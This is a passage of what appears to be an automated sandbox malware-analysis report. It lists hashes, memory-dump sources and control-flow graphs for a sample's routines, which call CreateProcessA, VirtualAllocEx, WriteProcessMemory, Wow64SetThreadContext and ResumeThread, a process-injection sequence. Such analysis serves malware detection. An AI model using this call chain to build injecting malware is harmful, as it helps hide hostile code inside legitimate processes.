                                              • Opcode Fuzzy Hash: 44f917e7511734ceb574a9ce9a5f3d393e9d8ee5b3f5380b26a3c64f704587dd
                                              • Instruction Fuzzy Hash: 0AA1A1B1D04229CFDB14DFA9C8847EEFBB2BB49304F50946AD419B7650EB741A4ACF50
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1341162971.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_55a0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 993d0a0061896b98b2cd5da122461100aad013f77dbfb6b7aedbb6c19fcf7466
                                              • Instruction ID: 95156f84e00791dc15e30f5b66b041bf6e5dd3f5113fda4fcaeb46b28bfa0c7f
                                              • Opcode Fuzzy Hash: 993d0a0061896b98b2cd5da122461100aad013f77dbfb6b7aedbb6c19fcf7466
                                              • Instruction Fuzzy Hash: 2791E0B2D05219DFDB24CFA9D488BEDBBB2BF4A301F10846AE419B7251DB745945CF40
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9fa72f7b3ac298cd68617b0417dd6c81ac192657adc58fef57bf881d5873d14b
                                              • Instruction ID: fa193e40c763bbdafd6280af6788e7dca450117f62f817ec05da0f935bf203dd
                                              • Opcode Fuzzy Hash: 9fa72f7b3ac298cd68617b0417dd6c81ac192657adc58fef57bf881d5873d14b
                                              • Instruction Fuzzy Hash: FC1130B4958258CFCB24CF54D8457F8BBB8EB4A351F006596961DA3391D7306A85CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 779 77b763c-77b76dd 781 77b76df-77b76e9 779->781 782 77b7716-77b7736 779->782 781->782 783 77b76eb-77b76ed 781->783 787 77b7738-77b7742 782->787 788 77b776f-77b779e 782->788 785 77b76ef-77b76f9 783->785 786 77b7710-77b7713 783->786 789 77b76fb 785->789 790 77b76fd-77b770c 785->790 786->782 787->788 791 77b7744-77b7746 787->791 798 77b77a0-77b77aa 788->798 799 77b77d7-77b7891 CreateProcessA 788->799 789->790 790->790 792 77b770e 790->792 793 77b7769-77b776c 791->793 794 77b7748-77b7752 791->794 792->786 793->788 796 77b7756-77b7765 794->796 797 77b7754 794->797 796->796 800 77b7767 796->800 797->796 798->799 801 77b77ac-77b77ae 798->801 810 77b789a-77b7920 799->810 811 77b7893-77b7899 799->811 800->793 803 77b77d1-77b77d4 801->803 804 77b77b0-77b77ba 801->804 803->799 805 77b77be-77b77cd 804->805 806 77b77bc 804->806 805->805 807 77b77cf 805->807 806->805 807->803 821 77b7922-77b7926 810->821 822 77b7930-77b7934 810->822 811->810 821->822 825 77b7928 821->825 823 77b7936-77b793a 822->823 824 77b7944-77b7948 822->824 823->824 826 77b793c 823->826 827 77b794a-77b794e 824->827 828 77b7958-77b795c 824->828 825->822 826->824 827->828 829 77b7950 827->829 830 77b796e-77b7975 828->830 831 77b795e-77b7964 828->831 829->828 832 77b798c 830->832 833 77b7977-77b7986 830->833 831->830 834 77b798d 832->834 833->832 834->834
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077B787E
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: cf4ef3b4c08819c2f0a3f9f7afe1fce38f28ce4bc0322e1cd41ff71e645fbef6
                                              • Instruction ID: b4c3d5dcba913a22caad202e10099b4769fa0e952a23217d652d3e6a848b5092
                                              • Opcode Fuzzy Hash: cf4ef3b4c08819c2f0a3f9f7afe1fce38f28ce4bc0322e1cd41ff71e645fbef6
                                              • Instruction Fuzzy Hash: 4AA15DB1D00219CFEB24DFA8C841BEDBBB2FF44314F1485AAD859A7250DB749985CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 836 77b7648-77b76dd 838 77b76df-77b76e9 836->838 839 77b7716-77b7736 836->839 838->839 840 77b76eb-77b76ed 838->840 844 77b7738-77b7742 839->844 845 77b776f-77b779e 839->845 842 77b76ef-77b76f9 840->842 843 77b7710-77b7713 840->843 846 77b76fb 842->846 847 77b76fd-77b770c 842->847 843->839 844->845 848 77b7744-77b7746 844->848 855 77b77a0-77b77aa 845->855 856 77b77d7-77b7891 CreateProcessA 845->856 846->847 847->847 849 77b770e 847->849 850 77b7769-77b776c 848->850 851 77b7748-77b7752 848->851 849->843 850->845 853 77b7756-77b7765 851->853 854 77b7754 851->854 853->853 857 77b7767 853->857 854->853 855->856 858 77b77ac-77b77ae 855->858 867 77b789a-77b7920 856->867 868 77b7893-77b7899 856->868 857->850 860 77b77d1-77b77d4 858->860 861 77b77b0-77b77ba 858->861 860->856 862 77b77be-77b77cd 861->862 863 77b77bc 861->863 862->862 864 77b77cf 862->864 863->862 864->860 878 77b7922-77b7926 867->878 879 77b7930-77b7934 867->879 868->867 878->879 882 77b7928 878->882 880 77b7936-77b793a 879->880 881 77b7944-77b7948 879->881 880->881 883 77b793c 880->883 884 77b794a-77b794e 881->884 885 77b7958-77b795c 881->885 882->879 883->881 884->885 886 77b7950 884->886 887 77b796e-77b7975 885->887 888 77b795e-77b7964 885->888 886->885 889 77b798c 887->889 890 77b7977-77b7986 887->890 888->887 891 77b798d 889->891 890->889 891->891
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077B787E
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 7004fa25f46ee0cac2631c51545ec86d7644cf9f070cc0330db839b2ea3e689a
                                              • Instruction ID: 618b8f95b1ec4818e7bcda68c01bf2009f1d95cc1f8f7dafa43917a2a9015fa4
                                              • Opcode Fuzzy Hash: 7004fa25f46ee0cac2631c51545ec86d7644cf9f070cc0330db839b2ea3e689a
                                              • Instruction Fuzzy Hash: E1916CB1D00319CFEB24DF68C841BEDBBB2BF88314F1485AAD859A7250DB749985CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 893 161ad48-161ad57 894 161ad83-161ad87 893->894 895 161ad59-161ad66 call 161a0a0 893->895 897 161ad89-161ad93 894->897 898 161ad9b-161addc 894->898 901 161ad68 895->901 902 161ad7c 895->902 897->898 904 161ade9-161adf7 898->904 905 161adde-161ade6 898->905 949 161ad6e call 161afe0 901->949 950 161ad6e call 161afd0 901->950 902->894 906 161adf9-161adfe 904->906 907 161ae1b-161ae1d 904->907 905->904 909 161ae00-161ae07 call 161a0ac 906->909 910 161ae09 906->910 912 161ae20-161ae27 907->912 908 161ad74-161ad76 908->902 911 161aeb8-161af78 908->911 914 161ae0b-161ae19 909->914 910->914 944 161af80-161afab GetModuleHandleW 911->944 945 161af7a-161af7d 911->945 915 161ae34-161ae3b 912->915 916 161ae29-161ae31 912->916 914->912 919 161ae48-161ae51 call 161a0bc 915->919 920 161ae3d-161ae45 915->920 916->915 924 161ae53-161ae5b 919->924 925 161ae5e-161ae63 919->925 920->919 924->925 926 161ae81-161ae85 925->926 927 161ae65-161ae6c 925->927 932 161ae8b-161ae8e 926->932 927->926 929 161ae6e-161ae7e call 161a0cc call 161a0dc 927->929 929->926 934 161aeb1-161aeb7 932->934 935 161ae90-161aeae 932->935 935->934 946 161afb4-161afc8 944->946 947 161afad-161afb3 944->947 945->944 947->946 949->908 950->908
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0161AF9E
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1334507692.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_1610000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: f5cb4656bad5e0af2a8631ce3efb0054411b969973e685ebd552471c632d6efc
                                              • Instruction ID: 7269016f6e4f78ed2d25c03c5049168353c1cc66944e5f7ec4b30aac0b56f167
                                              • Opcode Fuzzy Hash: f5cb4656bad5e0af2a8631ce3efb0054411b969973e685ebd552471c632d6efc
                                              • Instruction Fuzzy Hash: 1D716670A01B458FE724DFAAD84479ABBF2FF88204F04892DD48AD7B54DB75E845CB90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 951 161590c-16159d9 CreateActCtxA 953 16159e2-1615a3c 951->953 954 16159db-16159e1 951->954 961 1615a4b-1615a4f 953->961 962 1615a3e-1615a41 953->962 954->953 963 1615a51-1615a5d 961->963 964 1615a60 961->964 962->961 963->964 966 1615a61 964->966 966->966
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016159C9
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1334507692.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_1610000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 93aeada36e7b5ce7183139d78131e621ecd867bf9948a18331c11dfa42e4484d
                                              • Instruction ID: 88791f3d8d7f644b7113b80f6dfae691979a9277554269d2ab083bc655ebc354
                                              • Opcode Fuzzy Hash: 93aeada36e7b5ce7183139d78131e621ecd867bf9948a18331c11dfa42e4484d
                                              • Instruction Fuzzy Hash: 5641D2B1C00719CBDB24CFA9C8857CEBBB1BF49304F24846AD449AB255DBB55945CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 967 16144e0-16159d9 CreateActCtxA 970 16159e2-1615a3c 967->970 971 16159db-16159e1 967->971 978 1615a4b-1615a4f 970->978 979 1615a3e-1615a41 970->979 971->970 980 1615a51-1615a5d 978->980 981 1615a60 978->981 979->978 980->981 983 1615a61 981->983 983->983
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016159C9
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1334507692.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_1610000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 0c075a41ff5a4df1cce8e736c85e61360e29cc10e5abf65e62822e46ed7d171c
                                              • Instruction ID: fa29418c1122d6510ad266df6a3ea717708d1d79108b63e808ff594eb70aa155
                                              • Opcode Fuzzy Hash: 0c075a41ff5a4df1cce8e736c85e61360e29cc10e5abf65e62822e46ed7d171c
                                              • Instruction Fuzzy Hash: 4E41F2B1C00718CBDB24CFA9C884BCEFBB5BF49304F24806AD509AB255DBB56945CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 984 5574050-557408c 985 5574092-5574097 984->985 986 557413c-557415c 984->986 987 55740ea-5574122 CallWindowProcW 985->987 988 5574099-55740d0 985->988 992 557415f-557416c 986->992 989 5574124-557412a 987->989 990 557412b-557413a 987->990 995 55740d2-55740d8 988->995 996 55740d9-55740e8 988->996 989->990 990->992 995->996 996->992
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05574111
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1341017254.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_5570000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: c4a5731b3aa36cea5d2941d6dbdae496835ff95a717e6644ad2766c49e201d33
                                              • Instruction ID: ab489893e8a177587c9672661692bf1a2dae41de1c74afbf519eaafe3645b7ec
                                              • Opcode Fuzzy Hash: c4a5731b3aa36cea5d2941d6dbdae496835ff95a717e6644ad2766c49e201d33
                                              • Instruction Fuzzy Hash: 8D4147B8A00209CFCB14DF99D848AAABBF5FB88314F25C459D519AB321D774A841CFA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 998 77b73b8-77b740e 1000 77b741e-77b745d WriteProcessMemory 998->1000 1001 77b7410-77b741c 998->1001 1003 77b745f-77b7465 1000->1003 1004 77b7466-77b7496 1000->1004 1001->1000 1003->1004
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077B7450
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: a3aa693dad5007382aabf86f52bbe9e81794af96ce253f25361f3de2d48516aa
                                              • Instruction ID: 18668d99132741cb396a93017d806afee08eb3693066fbcf5fcedeb19f7cb7bc
                                              • Opcode Fuzzy Hash: a3aa693dad5007382aabf86f52bbe9e81794af96ce253f25361f3de2d48516aa
                                              • Instruction Fuzzy Hash: C12148B59003099FDB10CFA9C880BEEBBF1FF48310F54882AE959A7240C7789954CBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1008 77b73c0-77b740e 1010 77b741e-77b745d WriteProcessMemory 1008->1010 1011 77b7410-77b741c 1008->1011 1013 77b745f-77b7465 1010->1013 1014 77b7466-77b7496 1010->1014 1011->1010 1013->1014
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077B7450
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 79829d874190a98ced01ee4ddd9b8dfe5c28883c6cad1c38e6507633bc230da7
                                              • Instruction ID: b25cd06f7379246e7292d3a8143886e21505197ead4f05906938152ff07d3157
                                              • Opcode Fuzzy Hash: 79829d874190a98ced01ee4ddd9b8dfe5c28883c6cad1c38e6507633bc230da7
                                              • Instruction Fuzzy Hash: 842157B59003099FDF10CFAAC880BDEBBF4FF48310F50882AE959A7240C7789944CBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1030 77b74a8-77b753d ReadProcessMemory 1033 77b753f-77b7545 1030->1033 1034 77b7546-77b7576 1030->1034 1033->1034
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077B7530
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 373538369af42541e7252fd2eb7a133997b1e1a24cd42e47eb5cf8da25061396
                                              • Instruction ID: 0e90a49a9e379b13c84a4f60c06010f04a7320495ff5f82f0ab8743e2baa9fe2
                                              • Opcode Fuzzy Hash: 373538369af42541e7252fd2eb7a133997b1e1a24cd42e47eb5cf8da25061396
                                              • Instruction Fuzzy Hash: 132136B5D003099FDB10CFAAC880BEEBBF1FF48310F54842AE959A7250C7789545CBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1018 161b730-161d6b4 DuplicateHandle 1020 161d6b6-161d6bc 1018->1020 1021 161d6bd-161d6da 1018->1021 1020->1021
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0161D5E6,?,?,?,?,?), ref: 0161D6A7
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1334507692.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_1610000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: dc88a5feba6597a833e0df5147ab33420d8442b1fec3b25acb7ce1d5a3ab14ab
                                              • Instruction ID: 9cebcb4b50a2fd0f628abdec642692a13e46c37b15c7c2d23e958382078e9101
                                              • Opcode Fuzzy Hash: dc88a5feba6597a833e0df5147ab33420d8442b1fec3b25acb7ce1d5a3ab14ab
                                              • Instruction Fuzzy Hash: 5D21E5B5D00218AFDB10CF9AD884ADEBBF4EB48310F54842AE958A7350D374A954CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1024 161d618-161d61b 1025 161d620-161d6b4 DuplicateHandle 1024->1025 1026 161d6b6-161d6bc 1025->1026 1027 161d6bd-161d6da 1025->1027 1026->1027
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0161D5E6,?,?,?,?,?), ref: 0161D6A7
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1334507692.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_1610000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 97e11c3ba079a3c9a947f4f88d1089ad409e2de6956a89d03bc8d266aa24232b
                                              • Instruction ID: 1553993fc16187293c9708c3cb89908ee00b9f4d0b11964efdea44d5550721f5
                                              • Opcode Fuzzy Hash: 97e11c3ba079a3c9a947f4f88d1089ad409e2de6956a89d03bc8d266aa24232b
                                              • Instruction Fuzzy Hash: 4821E3B5900218AFDB10CF9AD884ADEBBF5FB48310F54842AE958A7350D378A944CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1038 77b6de9-77b6e3b 1040 77b6e4b-77b6e7b Wow64SetThreadContext 1038->1040 1041 77b6e3d-77b6e49 1038->1041 1043 77b6e7d-77b6e83 1040->1043 1044 77b6e84-77b6eb4 1040->1044 1041->1040 1043->1044
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B6E6E
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: c5c4e1e09059924f9ec63a13267a2e853b50cb3040812788c27d8516052289be
                                              • Instruction ID: 11cb899b4360df3d5b5065d81b8acaa2f2f1c68c0d532df894e0818a73222104
                                              • Opcode Fuzzy Hash: c5c4e1e09059924f9ec63a13267a2e853b50cb3040812788c27d8516052289be
                                              • Instruction Fuzzy Hash: 7F2137B1D003099FEB20CFAAC4847EEBBF1EB88314F54842AD559A7251CB789945CFA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1048 77b6df0-77b6e3b 1050 77b6e4b-77b6e7b Wow64SetThreadContext 1048->1050 1051 77b6e3d-77b6e49 1048->1051 1053 77b6e7d-77b6e83 1050->1053 1054 77b6e84-77b6eb4 1050->1054 1051->1050 1053->1054
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B6E6E
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: a1118d516f2323405f653eabf4166e7fc9dd4d40c9330d88e7f283635b63a973
                                              • Instruction ID: cab45f40c99c44c584a475db019e4eb24be53f2bccb44bbc6d08ac9d2b9aa0d3
                                              • Opcode Fuzzy Hash: a1118d516f2323405f653eabf4166e7fc9dd4d40c9330d88e7f283635b63a973
                                              • Instruction Fuzzy Hash: D92137B19003099FDB10CFAAC4857EEBBF4EB48314F548429D559A7241C778A945CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1058 77b74b0-77b753d ReadProcessMemory 1061 77b753f-77b7545 1058->1061 1062 77b7546-77b7576 1058->1062 1061->1062
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077B7530
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 816e76a34d4d64d7c50971099c2eb7d839b16323f56e4d44fffca8427438aaa5
                                              • Instruction ID: 5c6827913a80f5f309b6bfd27b3a40c36969b53f167be5e134b436e2d9e56b30
                                              • Opcode Fuzzy Hash: 816e76a34d4d64d7c50971099c2eb7d839b16323f56e4d44fffca8427438aaa5
                                              • Instruction Fuzzy Hash: C22125B1D003499FDB10CFAAC881BEEBBF5FF48310F50842AE959A7250C7789944CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1066 161a108-161b200 1068 161b202-161b205 1066->1068 1069 161b208-161b237 LoadLibraryExW 1066->1069 1068->1069 1070 161b240-161b25d 1069->1070 1071 161b239-161b23f 1069->1071 1071->1070
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0161B019,00000800,00000000,00000000), ref: 0161B22A
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1334507692.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_1610000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 587f21edcf4668fd287b70c402e40c74eed3e3e9ad5c07ce16f3369ae3597093
                                              • Instruction ID: cc9d79b3d2f34b9e0c83bbca626fc34ab9668afc8da60a2c2329319b4fe95d45
                                              • Opcode Fuzzy Hash: 587f21edcf4668fd287b70c402e40c74eed3e3e9ad5c07ce16f3369ae3597093
                                              • Instruction Fuzzy Hash: 7B11E4B6D003099FDB10CF9AD844BEEFBF4EB48310F55842AE959A7600C3B5A545CFA5
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0161B019,00000800,00000000,00000000), ref: 0161B22A
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1334507692.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_1610000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: c02c98436a056543d2d0b7e1a92945a2c8386fe21b8020d396d2a4e6df8cf257
                                              • Instruction ID: bea05f4f6a285ba5c44bb879dacada501f79a190e6de76b41b19b32f6ab37613
                                              • Opcode Fuzzy Hash: c02c98436a056543d2d0b7e1a92945a2c8386fe21b8020d396d2a4e6df8cf257
                                              • Instruction Fuzzy Hash: D611E4B6C002099FDB10CF9AD844BEEFBF4EB48310F54842AD959A7600C375A545CFA5
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077B736E
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 0c709300c57f9242d818fc62b49d6fe68ef0d77201bb4fbc54ff1ecf9c12e077
                                              • Instruction ID: 0301678371c1d4f8f7b43c0427e30869b61578637bc3cb2e3ea99995453bcf9d
                                              • Opcode Fuzzy Hash: 0c709300c57f9242d818fc62b49d6fe68ef0d77201bb4fbc54ff1ecf9c12e077
                                              • Instruction Fuzzy Hash: D8116AB59003489FDF24CFAAC4447EEBBF5EF88310F14882AD955A7250C7759944CFA0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077B736E
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 5c9e823a9b45955c2754d3e60e2e7533c9b35615a7cc55d3528df66db5573ce1
                                              • Instruction ID: ac2a97a6e58cbc99ae594db454986ba815c9c9f30d3366a019d9eb47d71a6b2d
                                              • Opcode Fuzzy Hash: 5c9e823a9b45955c2754d3e60e2e7533c9b35615a7cc55d3528df66db5573ce1
                                              • Instruction Fuzzy Hash: 651137B58003499FDF20DFAAC844BDEBBF5EF88310F14882AE955A7250C775A944CFA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: d4730394b85d883c9eb95f8df903d7ccc6c0a57c5aa6d9005891afd5baeef4a3
                                              • Instruction ID: 7d0c236573f4842dafad802623172fc4a1fe3c526c759bf117258b951ad23f96
                                              • Opcode Fuzzy Hash: d4730394b85d883c9eb95f8df903d7ccc6c0a57c5aa6d9005891afd5baeef4a3
                                              • Instruction Fuzzy Hash: 6E1158B1D043488FDB20DFAAD4447EEBBF5EF88310F248829D959A7250CB75A944CBA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 0384ef6c6c63ecd7b952cc3414b76619edae2fdc5624ef6bcaa4438091b60d50
                                              • Instruction ID: 90dbbc7a04de24e97758b0230dd9f2551c9563048b5e497bd2b0f0c229a57430
                                              • Opcode Fuzzy Hash: 0384ef6c6c63ecd7b952cc3414b76619edae2fdc5624ef6bcaa4438091b60d50
                                              • Instruction Fuzzy Hash: F71128B1D003489FDB20DFAAC4457DEFBF4EF88314F548429D559A7240C775A544CBA4
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 077BA35D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1343080636.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_77b0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 0fa118d0c3f229931a815f8fcd66354c0f6edb5b05d65bf2d42917b13cab69d9
                                              • Instruction ID: b5769e87d3479a2b255acfa3a292ac0f9387607a30ac6c23b2c63967f6aa7454
